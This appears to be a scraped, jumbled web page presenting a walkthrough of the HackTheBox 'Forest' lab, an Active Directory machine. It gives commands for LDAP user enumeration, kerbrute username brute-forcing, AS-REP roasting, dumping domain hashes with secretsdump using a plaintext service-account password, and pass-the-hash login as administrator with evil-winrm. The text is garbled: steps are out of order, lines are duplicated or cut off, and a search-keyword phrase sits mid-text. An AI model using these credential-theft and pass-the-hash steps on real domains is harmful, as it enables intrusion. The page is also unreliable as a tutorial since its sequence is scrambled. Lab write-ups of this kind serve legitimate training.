Forest Hackthebox Walkthrough Best -

ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local" This reveals the domain name: htb.local and several users. Forest is vulnerable to Kerberos AS-REP Roasting because some users have the Do not require Kerberos preauthentication setting enabled. Step 1: Enumerate Users Use enum4linux or impacket-GetADUsers to list domain users.

impacket-GetADUsers -dc-ip 10.10.10.161 htb.local/ Alternatively, use kerbrute to brute usernames from a wordlist:

From BloodHound, we see that svc-alfresco has WriteOwner on Exchange Windows Permissions . Use PowerView (upload via WinRM) or net commands: forest hackthebox walkthrough best

evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8 Now list the root directory:

impacket-secretsdump -just-dc htb.local/svc-alfresco:s3rvice@10.10.10.161 This will dump the NTLM hash of the Administrator account. ldapsearch -x -H ldap://10

The known attack: privilege on the Exchange Windows Permissions group.

kerbrute userenum --dc 10.10.10.161 -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt But for efficiency, we can also use ldapsearch : impacket-GetADUsers -dc-ip 10

ldapsearch -x -H ldap://10.10.10.161 -b "CN=Users,DC=htb,DC=local" | grep sAMAccountName svc-alfresco , sebastien , lucinda , andy , mark , santi . Step 2: Request AS-REP Hashes Use impacket-GetNPUsers to request hashes for users without preauth.